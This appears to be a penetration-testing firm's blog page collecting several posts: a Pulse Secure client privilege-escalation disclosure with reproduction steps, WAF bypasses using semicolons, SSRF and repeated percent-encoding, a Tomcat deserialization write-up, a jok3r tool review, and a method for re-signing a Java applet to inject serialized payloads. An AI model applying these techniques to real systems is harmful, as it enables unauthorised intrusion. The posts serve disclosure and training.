Blog

Pulse Secure Client for Windows <9.1.6 TOCTOU Privilege Escalation (CVE-2020-13162)

In the midst of the coronavirus pandemic we have observed an incredible boost in the diffusion of configurations allowing people to work from home. Being able to quickly identify vulnerabilities in the components of these infrastructures has become, more than before, a priority for many businesses. So the lenient Red Timmy has thought: “it would be good to kill some 0day while we go through this hard time“.

After careful evaluation of the options available, we have decided to proceed with a deep inspection of the Pulse Secure VPN client. Why? Beyond the large installation base in the Fortune 500 market, there are plenty of medium-size companies out there adopting the Pulse Secure products. Try to imagine a business distributing laptops to its employees through which they can connect remotely, via VPN, to the employer’s infrastructure and comfortably work from home. Of course the operating system running on these laptops is hardened in order to disallow the installation of arbitrary software, disable the antivirus or the other monitoring/security agents and more in general to avoid the execution from employees of any actions that would normally require admin rights.

Now imagine an employee (might be a malicious insider) escalating to “NT_AUTHORITY\SYSTEM” in one of these laptops before or after having established a connection to the company VPN network, with security measures, configurations and software disabled or tampered, with the possibility to install any programs or hide hacking tools in the system without restrictions, with the aim to lower down the threat detection and identification capabilities of SOC. How bad would it be? This is what could have happened by exploiting the vulnerability on Pulse Secure client we are going to talk about today, before the vendor patched it. We have registered CVE-2020-13162 for that.

High-Level Overview and Impact

Pulse Secure Client for Windows suffers of a local privilege escalation vulnerability in the “PulseSecureService.exe” service. Exploiting this issue allows an attacker to trick “PulseSecureService.exe” into running an arbitrary Microsoft Installer executable (“.msi”) with SYSTEM privileges, granting them administrative rights.

The vulnerability lies in the “dsInstallerService” component, which provides non-administrative users the ability to install or update new components using installers provided by Pulse Secure. While “dsInstallerService” performs a signature verification on the content of the installer, it has been found that it’s possible to bypass the check providing the service with a legit Pulse Secure installer and swapping it with a malicious one after the verification (see Analysis paragraph below).

The vulnerability is a TOCTOU (time-of-check to time-of-use) and can be exploited reliably using an exclusive opportunistic lock.

This bug can be exploited in default configuration and the tester is not aware of any available configuration preventing exploitation. All the versions we have tested < 9.1R6 (including the branch 5.x as the version 5.3 R70 released on January 2017) have been successfully exploited during our tests. The checks were conducted both on a fresh install of Windows 10 1909 and Windows 8.1.

The bug was discovered by Giuseppe Calì (@gsepcali). A full exploit, which will be released in the near future, has been written by Marco Ortisi (more about the exploit in the notes below).

Analysis

The server component of the Pulse Secure solution, Pulse Secure Connect, provides installers to deploy on client machines. Some of these, such as “Pulse Secure Installer Service (.exe)” and “Host Checker (.exe)“, can be installed without admin privileges (see Figure 1).

Figure 1: description of one of the observed installers provided in the PSC admin interface.

Despite stating that the packages “can be deployed with limited user privileges if a previous version of the Installer Service is running“, it has been found that a default install of Pulse Secure client allows to run the installers. The installers are available at “https://<pcs-host>/dana-admin/sysinfo/installers.cgi “.

Since these installers need to perform tasks requiring administrative right (such as creating files into the “Program Files (x86)” directory), we have decided to investigate how the corresponding non privileged processes are allowed to perform privileged tasks.

The installers are self-extracting executables (see Figure 2).

Figure 2: the extracted content of the “Pulse Secure Installer Service (.exe)” package.

Pulse Secure Installer Service (.exe)” works in the following way:

  1. Extracts its content to %TEMP%.
  1. Instructs “PulseSecureService.exe“, which runs as SYSTEM, to initiate the install process. This is done via a OLE interface exposed by the service.
  1. PulseSecureService.exe” verifies the signature of “VerifyAndInstall.exe” using the “CryptQueryObject()” WinAPI function.
  1. If the signature is valid, “PulseSecureService.exe” copies “VerifyAndInstall.exe” to “C:\Windows\Temp\PulseXXXXXXXX\“, where “XXXXXXXX” is a hex-encoded timestamp.
  1. PulseSecureService.exe” runs “VerifyAndInstall.exe“.
  1. VerifyAndInstall.exe” runs a verification routine on “%TEMP%\PulseSecureInstallerService.msi
  1. If the verification succeds, “PulseSecureInstallerService.msi” is copied to “C:\ProgramData\Pulse Secure\Installers\verified_PulseSecureInstallerService.msi“.
  2. PulseSecureInstallerService.msi” runs “C:\Windows\system32\msiexec.exe” as SYSTEM with “C:\ProgramData\Pulse Secure\Installers\verified_PulseSecureInstallerService.msi” as an argument and the installation starts.

The installation process can be observed using “Procmon” with the file names above as filters.

C:\ProgramData” is writable by non privileged users, that can create or modify files they own but not those created by other users.

In order to reproduce the issue and run code as SYSTEM, it is necessary to:

  1. Create an empty “C:\ProgramData\Pulse Secure\Installers\verified_PulseSecureInstallerService.msi
  1. Set an exclusive opportunistic lock on “C:\Windows\System32\msiexec.exe” (for example using this tool: https://github.com/googleprojectzero/symboliclink-testing-tools/tree/master/SetOpLock with the command “SetOpLock.exe C:\Windows\System32\msiexec.exe x“).
  1. Start the legit installer downloaded from the “Pulse Secure Connect” appliance.
  1. When the oplock is triggered, swap “C:\ProgramData\Pulse Secure\Installers\verified_PulseSecureInstallerService.msi” with a malicious “.msi” file.
  1. Release the oplock.

As a result, the malicious “.msi” file is executed with SYSTEM privileges.

Detection guidance

In order to detect this issue, it is sufficient to look for a non-SYSTEM process creating or writing to “C:\ProgramData\Pulse Secure\Installers\“. As the original files are always created and written to by the PulseSecure service, non-privileged writes to this location are always non-standard behavior and a possible exploitation attempt.

Different installers install to different locations. Another file path to watch for non privileged writes is “C:\ Users\<user>\AppData\Roaming\Pulse Secure“.

Exploit

We have developed two different exploits for this vulnerability. See one of them in action below.

However, we are not going to release the code immediately, but it will be published in our github soon. Why not now? Well, we have realized that is very difficult in practice, for Pulse Secure customers, to understand when the release of a new version of the VPN client provides a security bug fix or just a feature update. In fact, in the moment we write, both the release notes of the VPN client version 9.1R6 (the only one not affected) and the Security Advisories published in the PulseSecure website contain no mention to the fact that the previous versions of the product were affected by CVE-2020-13162.

The natural consequence of this reasoning is that there are very high chances that nobody has really updated the client with the latest version available because nobody is really aware of the fact that it provides a bug fix and not a feature update.

Update: 24 hours after we disclosed this vulnerability, Pulse Secure has released a security advisory related to it.

That’s all for today. Remember to follow us on twitter and while you are there connect to @gsepcali. More vulnerabilities and Red Team stories are coming…stay tuned!

Disclosure timeline

Vulnerability discovered: April 13th, 2020
Vendor contacted: April 15th, 2020
Vendor’s reply: April 17th, 2020
Patch released: May 22nd, 2020
Red Timmy Disclosure: June 16th, 2020
Security Advisory released by Pulse Secure: June 17th, 2020

Exploit release: date to be confirmed

How to hack a company by circumventing its WAF for fun and profit – part 3

One of the tools we are more proud of in absolute is Richsploit that we have released few months ago. It allows the exploitation of some EL injection and java deserialization vulnerabilities on multiple versions of RichFaces, an infamous Java library included with many JSF frameworks. Anyway the reason of our pride is not simply connected to the pleasure of being able to execute arbitrary code in a remote system. Also the good time spent to make Richsploit work in certain environments is something that we take into consideration and that is at the basis of the insecurity stories with WAF, and other security devices at layer 7, we are going to share with you today.

To scope or not to scope, that’s the problem

As part of our preparation process for a security test or exercise we normally go through a scoping document together with the customer in order to gain as much information as possible about the environment we will have to test. This is done because sometimes from the list of components, middleware solutions, libraries, etc… so gained, we are able to spot in advance elements useful for the definition of a potential attack path, which saves us a lot of time during the actual security test. The starting point of our story is exactly this. From the scoping document of one of our tests we have identified a component that used the Richfaces 3.x library known to be vulnerable, even though no public exploit existed for it. So, what does the little sympathetic Red Timmy normally do in these cases? Of course he installs that component and with it the exact version of the Richfaces vulnerable library in his local lab, in order to develop and test the exploit over there. Eventually that’s what we have done. Basically, two weeks before the official task’s start date, we had in our hand a full-fledged exploit!

Then it comes the day of the security test in the real customer environment. Same component…same version of Richfaces, but this time the target application is put at the very end of a chain of proxies, load balancers and firewalls of which we knew nothing about. And of course the exploit developed and tested in our lab refuses to work there…

An ASCII character will save us all

Immediately we have started to search the root cause for that, and here what we have discovered. Richfaces implements a custom base64 encoder that does something a normal base64 encoder would never dream to do: it produces in output an encoded object (a string to simplify…) containing one or more exclamation marks. Something like this:

To exploit the vulnerability, the malicious encoded object generated with the Richfaces custom base64 encoder must be passed to the server in the URI of an HTTP GET request, along with the ‘!’ symbol(s). Something like that:

However, for some reason the target application had no intention to serve requests coming with an exclamation mark in the path. Weird! In our local lab everything worked fine. To put it simple, something was preventing our payload to turn out to a beautiful RCE primitive. We had never hated the exclamation mark symbol so much before. A possible explanation for that was that one of the front-end network devices was unhappy with such type of requests. But honestly we will never know, as the case was not investigated at the end of the activity.

Meantime we noticed that the target application used a semicolon character to separate path and querystring, like this:

https://www.bucamitutto.com/appname/path/;jsessionid=DC3DE8B0 [...]

According to RFC 3986a semicolon is often used to delimit parameters and parameter values”.

What if we put a semicolon ‘;’ character in front of the Richfaces encoded object as shown below?

  • The server interprets the encoded object (in purple) not as part of the path but of the query string where the symbol ! is instead allowed. So WAF, load balancers and proxies have nothing to complain.
  • The Richfaces base64 decoding will be still successful, because the semicolon is a non-base64 character, and according to RFC 2045 “Any characters outside of the base64 alphabet are to be ignored”.
  • Because of what the RFC above mandates, the Richfaces base64 decoder will not terminate or throw an error when encounters the semicolon, but skip over it and continue the decoding process as if the character is not there.
  • The decoded malicious payload is then correctly decoded and processed by Richfaces.
  • The payload is executed and RCE condition achieved. Victory!  \o/

The last resort

When one moves from exploiting Richfaces 3.x to Richfaces 4.x, the endpoint to shoot on is instead different compared to the one seen in the previous paragraph. With Richfaces 4.x it is something similar to:

https://www.bucamitutta.com/rfRes/org.richfaces.resource.MediaOutputResource.faces?do=<malicious_encoded_payload>

The request can be sent either as GET or POST: Richfaces handles both methods.

One day the astute Red Timmy faced an unusual (until that moment) situation for him. The application under analysis presented the traces of some resources normally decorating the Richfaces front-end elements, but a F5 Big-IP device blocked any access to the “MediaOutputResource” component.

The device had the Application Security Manager (ASM) and Local Traffic Manager (LTM) modules enabled and a set of custom iRules deployed. The WAF policy was configured in blocking mode, meaning that an error message with a support ID was returned back in case of attack detection.

The custom rules checked that:

  1. the path of each HTTP request did not point to the URL of the “MediaOutputResource” component and the URI did not contain the “do” parameter.
  2. In case of POST request, in addition to the check on the path, the presence of the parameter “do” was verified in the request’s body and not in the URI.

Specifically the rule “1” was applicable to all HTTP methods, not only GET. If the checks were not passed, the request was blocked and an error message returned back to the client.

In addition, differently than how seen in another of our blog posts, no percent-decoding misconfigurations could be appreciated. Everything looked fine. With such a kind configuration in place nothing can go wrong, right?

However, at a certain point we noticed that our target application was exposing the servlet “auth”. It was reachable via POST and took in input the parameter “res” that in the request we intercepted with Burp was pointing to a URL inside the target domain.

For example if “res=https://someserver.somedomain/path?querystring” is provided in the request’s body, as consequence of that the servlet issues a subsequent request like this:

HEAD /path?querystring HTTP/1.1
Host: someserver.somedomain
[...]

Fundamentally, it sends out an HTTP HEAD request based on the content of the parameter “res”. It means we are totally in control of the path, the query string and the target server. We cannot control the HTTP method (all the requests are sent out with the HEAD method by default) but that’s not a problem, as Richfaces 4.x can be exploited through GET which is syntactically similar to HEAD. The only difference is the fact that with HEAD the HTTP body is not returned in the reply, but we will survive to that.

Honestly we are not even “totally” in control of the target server. There is a restriction based on the domain. We could not go outside of the domain we were targeting in that moment (somedomain in the example above). But that was not a problem too, as the Richfaces instance we wanted to exploit was just living into that domain.

Given these premises, what if we set the parameter “res” to the value “https://allowedHost.somedomain/rfRes/org.richfaces.resource.MediaOutputResource.faces?do=<malicious_encoded_payload>” ?

The request crosses the chain of load balancers, firewalls, proxies, etc… completely untouched. Why untouched? Because rule “1” and “2” are not applicable in this case. According to these rules:

  • The path must not point to the URL of MediaOutputResource -> indeed it is set to “/auth”.
  • The URI must not contain the “do” parameter -> in fact there is no “do” parameter.
  • In case of POST request (…and we have a match here) the “do” parameter must not be present in the request’s body. And indeed in the request body there is only the parameter “res”. The value “do” exists only as part of the content pointed to by the “res” parameter (and not as a parameter per se) which is not sufficient condition to block the request.

So, now that we are convinced the request passes through, let’s see what comes next. The request finally lands to the “auth” servlet in the web application server. Here the content of the “res” parameter is extracted and the subsequent HTTP request is issued:

HEAD /rfRes/org.richfaces.resource.MediaOutputResource.faces?do=<malicious_encoded_payload> HTTP/1.1
Host: allowedHost.somedomain
[...]

Due to the WAF configuration mentioned before, this request would be blocked *if* sent from the internet. Indeed the rule “1” would be triggered (the path points to the MediaOutputResource component and the “do” parameter is present in the URI now). However when a malicious request is reflected via SSRF, like in our case, it normally comes from inside the targeted network, ideally localhost if the SSRF endpoint shares the same vhost with the Richfaces component or even a different vhost but configured in the same server. In such cases the request does not cross the WAF(s), load balancers or other security appliances anymore, which are all bypassed (see the picture below).

Indeed after our payload has triggered the vulnerability and we have managed to compromise the target system, a grep for “127.0.0.1” in the web application server’s log files has revealed the following thing:

In simple terms, the HEAD request to “/rfRes/org.richfaces.resource.MediaOutputResource.faces?do=<malicious_encoded_payload>” was clearly coming from localhost, where the vulnerable Richfaces component resided as well, without leaving the targeted system.

And that was another great victory. \o/ \o/

The bottom line

As the Red Timmy’s grandfather always said: “When you need to bypass WAF, the last resort is SSRF”.

These and other WAF policies and signatures bypass techniques (like shell globbing, undefined variables, self-reference folder, etc…) will be taught, along with additional updated content, in our Practical Web Application Hacking Advanced Training on 3-4 August. This year the course will be totally delivered in virtual format. Follow the news in the main page!

And don’t forget to follow us on twitter too: https://twitter.com/redtimmysec

Apache Tomcat RCE by deserialization (CVE-2020-9484) – write-up and exploit

A few days ago, a new remote code execution vulnerability was disclosed for Apache Tomcat. Affected versions are:

  • Apache Tomcat 10.x < 10.0.0-M5
  • Apache Tomcat 9.x < 9.0.35
  • Apache Tomcat 8.x < 8.5.55
  • Apache Tomcat 7.x < 7.0.104

In other words, all versions of tomcat 7, 8, 9 and 10 released before April 2020. This most certainly means you have to update your instance of tomcat in order not to be vulnerable.

Prerequisites

There are a number of prerequisites for this vulnerability to be exploitable.

  1. The PersistentManager is enabled and it’s using a FileStore
  2. The attacker is able to upload a file with arbitrary content, has control over the filename and knows the location where it is uploaded
  3. There are gadgets in the classpath that can be used for a Java deserialization attack

Tomcat PersistentManager

First some words about the PersistentManager. Tomcat uses the word “Manager” to describe the component that does session management. Sessions are used to preserve state between client requests, and there are multiple decisions to be made about how to do that. For example:

  • Where is the session information stored? In memory or on disk?
  • In which form is it stored? JSON, serialized object, etc.
  • How are sessions IDs generated?
  • Which sessions attributes do we want to preserve?

Tomcat provides two implementations that can be used:

  • org.apache.catalina.session.StandardManager (default)
  • org.apache.catalina.session.PersistentManager

The StandardManager will keep sessions in memory. If tomcat is gracefully closed, it will store the sessions in a serialized object on disk (named “SESSIONS.ser” by default).

The PersistentManager does the same thing, but with a little extra: swapping out idle sessions. If a session has been idle for x seconds, it will be swapped out to disk. It’s a way to reduce memory usage.

You can specify where and how you want swapped sessions to be stored. Tomcat provides two options:

  • FileStore: specify a directory on disk, where each swapped session will be stored as a file with the name based on the session ID
  • JDBCStore: specify a table in the database, where each swapped session will be stored as individual row

Configuration

By default, tomcat will run with the StandardManager enabled. An administrator can configure to use the PersistentManager instead, by modifying conf/context.xml:

<Manager className="org.apache.catalina.session.PersistentManager"
         maxIdleSwap="15">  
  <Store className="org.apache.catalina.session.FileStore"
         directory="./session/" />
</Manager>  

When there is no Manager tag written in context.xml, the StandardManager will be used.

The exploit

When Tomcat receives a HTTP request with a JSESSIONID cookie, it will ask the Manager to check if this session already exists. Because the attacker can control the value sent in the request, what would happen if he put something like “../../../../../../tmp/12345“?

  1. Tomcat requests the Manager to check if a session with session ID “../../../../../../tmp/12345” exists
  2. It will first check if it has that session in memory.
  3. It does not. But the currently running Manager is a PersistentManager, so it will also check if it has the session on disk.
  4. It will check at location directory + sessionid + ".session", which evaluates to “./session/../../../../../../tmp/12345.session
  5. If the file exists, it will deserialize it and parse the session information from it
The web application will return HTTP 500 error upon exploitation, because it encounters a malicious serialized object instead of one that contains session information as it expects.

From the line in the stacktrace of the above image marked in red we see that the PersistentManager tries to load the session from the FileStore. The blue line then shows that it tries to deserialize the object. The error is thrown after deserialization succeeded but when it tried to interpret the object as a session (which it is not). The malicious code has already been executed at that point.

Of course, all that is left to exploit the vulnerability is for the attacker to put a malicious serialized object (i.e. generated by ysoserial) at location /tmp/12345.session

It doesn’t make much sense to create an exploit as it’s just one HTTP request. There is however a very quick and convenient PoC written by masahiro311, see this GitHub page.

Conclusion

This attack can have high impact (RCE), but the conditions that need to be met make the likelihood of exploitation low.

  • PersistentManager needs to be enabled manually by the tomcat administrator. This is likely to happen only on websites with high traffic loads (but not too high, as it will be more likely that a JDBC Store is used instead of a File Store)
  • The attacker has to find a separate file upload vulnerability to place the malicious serialized file on the server.
  • There have to be libraries on the classpath which are vulnerable to be exploited by a Java deserialization attack (e.g. gadgets).

However, a large range of versions of tomcat are affected.

To learn more about advanced web application attacks like these, register for our virtual course at BlackHat USA 2020: Practical Web Application Hacking Advanced.

And don’t forget to follow us on twitter: @redtimmysec

References

Speeding up your penetration tests with the Jok3r framework – Review

As penetration testers doing tests on web applications and infrastructure, we use a lot of tools to speed up our jobs. We scan the network with nmap, if we find a web server we might fire off nikto and dirbuster and for an exposed RMI port we try remote deserialization attacks with BaRMIe. Still, it’s a sequential activity: we try one tool one-after-another. What if we had a framework that would

  • Have all tools available and up to date
  • Run tools, analyze their output and run other relevant tools

This is the aim of the jok3r framework (https://www.jok3r-framework.com/). According to it’s front page it aims to “automate as much stuff as possible in order to quickly identify and exploit ‘low-hanging fruits’ and ‘quick win’ vulnerabilities on most common TCP/UDP services and most common web technologies”

We put the tool to the test and see if it’s really useful or just a waste of time.

Setting up

Jok3r conveniently runs in a docker container with all tools pre-installed. Setting up is just a matter of running a docker pull command and executing the container. Because a lot of tools are there, the compressed size (what you will pull) is around 9 GB. Uncompressed it takes about 16GB on disk.

Usability

Once pulled, you can run the container which brings you to a bash shell in an ubuntu based image. After that, each command to jok3r has to be given like this:

python3 jok3r.py [command]

That’s a little inconvenient, compared to tools like Metasploit which have their own interactive interpreter. I guess you could write a wrapper yourself, but it’s disappointing that it’s not there by default.

Overview of all tools available

Running python3 jok3r.py toolbox --update-all --fast will auto-update all tools.

Unfortunately after running all updates (which sometimes needed manual confirmations even though –fast parameter was given), jok3r.py didn’t run anymore because of an updated python library (cmd2) that was incompatible. We reported this issue at https://github.com/koutto/jok3r/issues/43

Testing

Jok3r uses the concept of a ‘mission’ to describe a security test. By running python3 jok3r.py db, we get into an interactive shell (so part of the framework does use it.. why not everything?), where we can define the mission name, target IPs, and specific scans we want to enable/disable. It’s also possible to import nmap results from an xml file, but unfortunately we got a parser error when trying to do that.

Once we defined the target, we can run python3 jok3r.py attack -t https://www.example.com/ --add2db <mission> to run all security checks. Jok3r will now run each and every tool suitable for a http endpoint one-by-one (more than 100). It’s smart enough to parse the output of recon tools, so it can skip vulnerability checks and exploits later on. For example, when it finds no instance of a wordpress application, wpscan is skipped.

Starting the security checks on our target

Unfortunately, some tools will hang and have to be killed with ctrl-c. That makes it unsuitable for a fire-and-forget approach, as you have to kill tasks from time to time.

We tested an http service, for which it has about 100 checks. There are checks available for ftp, java-rmi, mysql, oracle, rdp, smb, snmp, ssh and some more smaller services, however the number of checks done for these is very small (around 7 on average). It looks like jok3r is mainly geared towards pen testing web applications.

Reporting

When the scan is finished, you can generate an HTML report which will conveniently list the output of the tools, as well as found vulnerabilities. This interface is very suitable for browsing results, rather than looking at the command line output.

The clickable HTML report lists the output of each tool

Conclusion

The concept of jok3r is very interesting, and using the tool definitely speeds up pen tests. It’s beneficial mainly for infrastructure tests where you need to scan a large number of IPs, which would be a lot of work to do manually. Be aware that the number of services it can scan is limited.

If jok3r was truly fire-and-forget, it would have been a convenient way to get some extra recon done. But unfortunately it depends on 3rd party tools which can crash or hang, and the user has to manually intervene. Therefore, in our opinion it doesn’t add much value over tools like nessus or service scans from nmap.

Hey! Red Timmy Security will be at Blackhat Las Vegas this year too! Check out our trainings!

Practical Web Application Hacking Advanced 1-2 August and 3-4 August 2020.

Exploiting JD bugs in crypto contexts to achieve RCE and tampering with Java applets

A little over two months ago at Red Timmy Security we have released EnumJavaLibs, a tool allowing the discovery of which libraries are available in the classpath of a remote Java application.

The original idea of developing such a kind of tool is very interesting and we think would be a shame not to talk about it. It came from an assessment that was conducted a year and a half ago and led to the discovery of a Java Deserialization vulnerability on a critical application.

As we are under NDA for that project, there is not any possibility for us to divulge the name of the vendor and the product affected. However, we can describe generically the architecture and give you something juicy to learn from.

General architecture

The solution to analyse was a web application written with GWT that could be accessed only with previous TLS mutual authentication by means of a HSM (Hardware Security Module) device. The authentication process required a Java Applet.

The Google Web Toolkit Framework (GWT) was used for both server and client components. Separate from the GWT implementation, as already said, there was a Java Applet. It was downloaded by the user’s browser during the interaction with the front-end web application before authentication. It was utilized solely for communicating with the hardware token, client side, where a private key was stored.

Basically the GWT-server application and the GWT-client component were in direct communication. Also the GWT-client component spoke to the Java applet which in turn talked to the hardware token to perform operations such as data signing, needed during the authentication process. This information was finally transmitted to the server by the GWT-Client. The following diagram should clarify the generic architecture.

But let’s start from scratch.

The authentication process

When the hardware token is plugged in, a PIN is typed in to unlock the device and the login can start. At this point the authentication process is initiated and a Login request to the server is issued (see screenshot below).

The Login request is very interesting because contains an ASN.1 DER encoded stream (starting with “MII[..]” in the POST body) wrapped around another layer of encoding done with Base64. Why do not we decode it with the “openssl” binary and look inside?

Line 62 reveals the presence of a Java serialized object (sequence “ACED0005”) containing what seems a random number, a session ID and a timestamp. May be it will be deserialized on server side? To explore our hypothesis we decide to change the object at line 62 with something else (another payload generated with “ysoserial”) and submit it to the server. However, the procedure does not seem to work properly. But why? The answer we are looking for arrives after we decide to decompile and analyse the Java applet too.

The analysis pinpointed that yes we were right, at line 62 there is a Java serialized object but line 1591 is containing a RSA-SHA256 digital signature which protects the Java object itself from tampering. Now is clear why the server is not collaborating: in order to inject our own Java serialized payload at line 62 we need a way to bypass that digital signature. One approach might be to find a way to get the private key out of the hardware token, but this is probably going to keep us busy for long time. We opted instead for the “collaborative” approach. The Java applet cannot access the private key directly, however it can ask the HSM (through an interface specially exposed) to sign an arbitrary value and return it back to the applet. The Java applet could be modified as just described and act as our proxy, but there is another problem: it is digitally signed too and with the latest versions of JRE, Java refuses to run it even though we set all the security checks to the minimum possible.

Bypassing the Java checks and opening our way to JD

This is how we bypassed it in nine steps and managed to inject an arbitrary serialized payload:

  • The Java serialized object that holds the attacker payload is generated with “ysoserial” or similar tools.
  • The applet is downloaded from the web server, decompiled and its code modified in order to read from disk the custom Java object generated at point 1, just before it is digitally signed.
  • All the signature files inside “appletfile.jar/META-INF” are deleted. This will make the applet unsigned.
  • The Java applet is now signed again, but this time with a self-signed certificate:

      $ keytool -genkey -keyalg RSA -alias myKey -keystore myKeystore -validity 360

      $ jarsigner -keystore myKeystore -verbose appletfile.jar myKey

  • The security settings in the Java configuration are set to “High” (lowest value). Also the target website is added to the exception list and the certificate generated at step 4 is imported as “Secure Site CA”. This actually decreases and circumvents the security control of the local Java installation. However, there are multiple ways to bypass it, other than this. So feel free to follow any procedure you are comfortable with.
  • First time, we browse the target website as usual. The “appletfile.jar” is downloaded and stored in a cache by Java.
  • Then we search and find the jar file inside the browser cache directory and replace it with the modified and re-signed applet.
  • Now we close the browser and open it again, visiting the target website for the second time. Java will complain about the modified applet but all the security warning messages popping up can be safely ignored.
  • Upon performing the Log-in, our custom serialized Java object is signed and sent to the server.

Logging in of course fails, but the Java deserialization attack should be done at this point. In our specific case we noticed that the server’s reply would change based on what we store inside our object. For example if we serialize an empty “String” object, the reply shows the code XXXX5:

HTTP/1.1 200 OK
Connection: close

//EX[4,0,3,'WdZtoTv',2,0,1,["com.xxxxxxxxxxxxxxxx.xxxxClientException/1437829146","java.util.Date/3385151746","XXXX5","Your operation failed due to an internal error. "],0,7]

If instead we serialize an inexistent object (one not in the classpath of the Java remote application) a similar text message is received in the reply but with “XXXX9” code instead. In simple terms the aplication is behaving as an oracle! From here the idea to create EnumJavaLibs! As the server responds with two different error codes, this fact can be leveraged to find out what libraries it has in the classpath and customize the attack, instead of blindly generating payloads.

Due to the limited amount of time to close the investigation and in order to confirm whether or not what we have discovered is actually a Java deserialization vulnerability or something else, we have asked the vendor the permission to look at the server-side code. Finally our request has been accepted, and this what we have found.

On server side, in the part of the code handling the incoming login request, inside “pkcs7.getContentStream()” there is the call to “readObject()” performing deserialization. This confirms the criticality of the vulnerability.

As can be seen from the above two code snippets, exception “XXXX9” is thrown when “readObject()” fails, in case anything goes wrong during deserialization. Exception “XXXX5” is thrown instead when the object that is read is not an instance of LoginRequest, which actually occurs after deserialization and does not prevent the attack to be placed. Of course bad things can be done only if a valid gadget chain is provided (there was no lookahead protection implemented by the way), but it is not the goal of this blog post to talk about that.

Conclusion

Nice experience! As a general recommendation, do not trust user input when performing deserialization and implement look-ahead protection to prevent an unexpected object from being deserialized.

From an attacker standpoint, be aware that Java serialized objects can be hidden inside other data structures, such as certificates. Also, digital signatures on Java applets only protect against attackers who MITM an applet with a malicious one, so the client will get warnings. It will NOT protect against attackers tampering with the applet running on their own systems: they can just ignore the warnings.

Finally, if you have an application acting as an oracle when sending (malformed) serialized objects, try EnumJavaLibs. Below some references in case you want to do a deep dive into the topic. And don’t forget to follow us on twitter: https://twitter.com/redtimmysec

References:

https://www.owasp.org/index.php/Top_10-2017_A8-Insecure_Deserialization

https://www.ibm.com/developerworks/library/se-lookahead/index.html

Hey! Red Timmy Security will be at Blackhat Las Vegas this year too! Check out our trainings!

Practical Web Application Hacking Advanced 1-2 August and 3-4 August 2020.

How to hack a company by circumventing its WAF for fun and profit – part 2

So far, one of the most successful and visited posts in our blog has been this one. Following the interest of readers on the topic, we have decided to publish more contents like that. What we will be doing periodically in these spaces is to recount a few stories extrapolated from circumstances that happened for real. We had a lot of fun by living them in first person during penetration testing sessions, red team operations or well deserved bug bounties. We hope you will have too.

The “single-encoded-byte” bypass

Some time ago, we have been contacted to perform the revalidation of a RCE web vulnerability that could be triggered by visiting a URL similar to this:

https://victim.com/appname/MalPath/something?badparam=%rce_payload%

The application was hosted behind a Big-IP device with ASM (Application Security Manager) module enabled, a layer 7 web application firewall (WAF) available on F5’s BIG-IP platforms. To react immediately and not leave the solution exposed to the internet, the network engineers thought well of deploying a custom WAF rule to protect the endpoint before a formal fix was actually introduced in the application’s code. Our role consisted of investigating the effectiveness and robustness of this rule which looked like something similar to this:

The meaning of it was that in case a HTTP GET request had been intercepted (line 2) and the lowercase-converted URI contained both the strings “/malpath/” and “badparam=” (lines 3 and 4), the request would have been logged first (line 7) and then blocked by returning the HTTP error 404 to the client (line 8).

Actually, after deploying the custom WAF rule, by visiting the URL:

https://victim.com/appname/MalPath/something?badparam=%rce_payload%

…we receive the 404 HTTP error, meaning that the rule is working and the WAF is doing properly its job.

However, by reading the F5 documentation we discovered that the directive “HTTP::uri” (lines 3 and 4) returns the URI of the request without first fully decoding it! So if we visit the URL:

https://victim.com/appname/%4dalPath/something?badparam=%rce_payload%

…with “%4d” being the URL-encoded form of the character ‘M’, this is what happens:

  • The WAF intercepts the GET request. The URI in there “/appname/%4dalPath/something?badparam=%rce_payload%” is first entirely converted to lowercase because of the “tolower” function in the WAF rule, and becomes “/appname/%4dalpath/something?badparam=%rce_payload%”.
  • Then the URI is looked for the presence of the strings “/malpath/” and “badparam=”. Anyway, in the first case the string “/%4dalpath/” we sent does not match with the string “/malpath/” in the WAF rule (line 3), which hence is not hit.
  • Once the WAF control is bypassed, the HTTP request reaches the backend server where the URI canonicalization and decoding processes take place. So the request containing the URI converted from “/appname/%4dalPath/something?badparam=%rce_payload%” to “/appname/MalPath/something?badparam=%rce_payload%” is passed to the target web  application which in turn serves it.
  • The “%rce_payload%” is now executed and produces its effects (opening of a reverse shell, invocation of an operating system command, etc…)

Here the lesson learnt of the day is: always ensure that URI is decoded before comparing and checking it. Absolute lack of URI decoding is very bad. The usage of “contains” keyword in a WAF rule is even worse.

Partial URL decoding = full bypass

A couple of days later we were called back again to carry out the revalidation of the revalidation (lol) as the fix in the application code was taking more time than expected.

This time visiting both the URLs:

https://victim.com/appname/MalPath/something?badparam=%rce_payload%

and

https://victim.com/appname/%4dalPath/something?badparam=%rce_payload%

returned the 404 error page. In simple words, the WAF blocked us.

Then we attempted to double encode the letter “M” of “/Malpath/” with the sequence “%254d”. The final URL to visit was:

https://victim.com/appname/%254dalPath/something?badparam=%rce_payload%

Nothing. The web application firewall was blocking this request too. The reimplementation of the WAF rule now looks something like this:

Here the lines from 15 to 24 are equivalent to the lines 1-10 of the previous rule’s version. However this time the strings “/malpath/” and “badparam=” are checked against a variable called “$decodeUri” (lines 17 and 18) and not “HTTP::uri” as done before. What is this and where does it come from? Actually the lines from 1 to 14 are defining its content. In simple terms the “$decodeUri” variable is just the URI of the request (“[HTTP::uri]” at line 2). It is URI-decoded at most “max” times (with “max” being defined at line 4) through a “while” loop (lines 9-13) by using a counter variable (“cnt” declared at line 5). The loop is interrupted in case there are no more encoded characters left or the iteration in the cycle has occurred for “max” times (with “cnt” increased during each iteration).

To better understand what’s going on here, it could be helpful to browse this page and perform fourfold percent-encoding of the letter “M” by writing the sequence “%252525254d” into the text box. Now press over the “Decode” button (see picture below) for four times and during each pause see what happens. Have you seen it? This is exactly what the WAF rule above is doing with our URI.

So to bypass it, we have simply visited the following URL:

https://victim.com/appname/%252525254dalPath/something?badparam=%rce_payload%

On reception the WAF decodes the URI as follows:

  • (1st iteration of the loop):
    /appname/%2525254dalPath/something?badparam=%rce_payload%
  • (2nd iteration of the loop):
    /appname/%25254dalPath/something?badparam=%rce_payload%
  • (3rd iteration of the loop):
    /appname/%254dalPath/something?badparam=%rce_payload%
  • (4th iteration of the loop):
    /appname/%4dalPath/something?badparam=%rce_payload%

When the WAF rule quits the loop, the request’s URI is set to “/appname/%4dalPath/something?badparam=%rce_payload%“. Again, as in the previous case, the string “/malpath/” (line 17 of the WAF rule) does not match with the one in the URI “/%4dalpath/”, so the WAF let the request pass through. The control is bypassed once more and the effect is always the execution of “%rce_payload%”. GAME OVER for the second consecutive time.

